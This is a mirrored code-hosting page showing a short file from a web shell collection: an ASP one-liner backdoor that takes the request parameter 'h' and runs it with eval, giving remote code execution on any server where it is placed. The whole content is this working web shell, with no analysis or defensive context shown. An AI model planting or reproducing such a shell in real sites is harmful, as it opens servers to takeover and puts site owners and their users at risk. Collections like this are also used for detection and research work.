mirror of
https://github.com/tennc/webshell
synced 2024-11-13 23:17:10 +00:00
8 lines
71 B
Text
8 lines
71 B
Text
|
<%
|
||
|
dim x1,x2
|
||
|
x1 = request("h")
|
||
|
x2 = x1
|
||
|
eval x2
|
||
|
%>
|
||
|
<!-- yes++ -->
|